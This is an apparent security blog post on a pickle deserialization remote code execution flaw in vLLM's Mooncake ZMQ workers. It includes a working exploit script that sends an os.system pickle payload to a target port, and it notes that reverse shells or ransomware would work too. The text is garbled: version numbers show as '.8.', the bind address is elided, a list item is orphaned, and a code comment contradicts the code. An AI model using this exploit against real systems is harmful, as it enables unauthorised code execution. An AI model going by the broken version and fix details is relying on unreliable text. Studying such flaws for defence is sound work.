CVE-2025-29783 - Critical Remote Code Execution Vulnerability in vLLM with Mooncake (Exploit & Deep Dive)

A critical remote code execution (RCE) vulnerability (CVE-2025-29783) has been found in vLLM when configured with Mooncake for distributed serving. The flaw allows attackers to execute arbitrary code on any vLLM node over the network by abusing unsafe deserialization exposed via ZMQ/TCP, unless you have upgraded to vLLM .8. or later. In this post, we'll walk through what happened, see a real exploit example, and review how to secure your clusters.

What is vLLM and Mooncake?

vLLM (<https://github.com/vllm-project/vllm>) is a fast, memory-efficient serving engine for large language models. It enables scalable, high-throughput inference for LLMs, supporting GPT-family architectures.

Mooncake is a KV (Key-Value) store module in vLLM designed to support distributed inference across multiple nodes. For coordination, it communicates between nodes over ZMQ/TCP sockets.

The Vulnerability: Unsafe Deserialization over the Network

When vLLM is started with Mooncake enabled, worker nodes accept serialized task/control objects over a network-accessible ZMQ/TCP interface. The critical oversight: Mooncake prior to vLLM .8. deserialized received data without any input validation or authentication.

Attackers can exploit this by sending crafted payloads that, when deserialized, will execute arbitrary Python code on the target host.

All vLLM versions prior to .8. using Mooncake in distributed setups.

- Vulnerable out-of-the-box if Mooncake is enabled (no firewall/isolation).

Where’s the Problem?

Here’s a simplified snippet (representative, not verbatim) to show the pattern for unsafe deserialization in Mooncake’s ZMQ worker code:

import zmq
import pickle

context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://...:5555")  # Listens on all interfaces!

while True:
    b = socket.recv()            # Receives bytes from anyone!
    data = pickle.loads(b)       # UNSAFE: Binary deserialization from untrusted source!
    result = handle(data)
    socket.send(pickle.dumps(result))

The above code deserializes any data sent to the network socket using pickle.loads, which is not safe against arbitrary attacker input.

The Exploit

Sending a malicious pickle payload to execute arbitrary shell commands is trivial. Here’s a minimal exploit to open a shell on the target host:

Exploit Code: Remote Code Execution Example

import zmq
import pickle
import os

# Create a malicious payload (executes a reverse shell, for demo)
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('touch /tmp/vllm_hacked',))

payload = pickle.dumps(Exploit())

# Send to target Mooncake server
context = zmq.Context()
s = context.socket(zmq.REQ)
s.connect("tcp://TARGET_HOST:5555")
s.send(payload)
resp = s.recv()  # (optional: read server response)

Result: The Mooncake worker on TARGET_HOST will execute touch /tmp/vllm_hacked, silently creating a file and demonstrating code execution.

> More damaging payloads, such as reverse shells or ransomware, would work just as easily!

Mitigation & Fix

This vulnerability was fixed in vLLM .8..
- Developers changed deserialization to use a safe format (likely json, custom codecs, or used explicit whitelisting).
- Network authentication/gating is now possible.

### How to Fix / Protect Yourself

Always deploy behind firewalls; restrict network access to trusted hosts.

4. For airgapped clusters that cannot be upgraded right away, use host firewalls (iptables, security groups) to block public ZMQ ports.

References & Further Reading

- vLLM Official Repository: <https://github.com/vllm-project/vllm>
- vLLM .8. Release Notes: <https://github.com/vllm-project/vllm/releases/tag/v.8.>
- ZMQ Security Pitfalls
- Python pickle security warning

CVE-ID: CVE-2025-29783 *(when official entry is published)*

Conclusion

CVE-2025-29783 in vLLM's Mooncake is a textbook example of the dangers of unserialized code over the network. If you are using vLLM distributed deployments with Mooncake, patch immediately! If you can't upgrade, at least firewall Mooncake's ports and restrict access.

Stay safe, and validate those inputs!

*— This analysis was compiled exclusively for the LLM security community.*

*If you found this helpful, please share with colleagues managing AI infrastructure!*

Timeline

Published on: 03/19/2025 16:15:32 UTC
Last modified on: 03/22/2025 01:15:30 UTC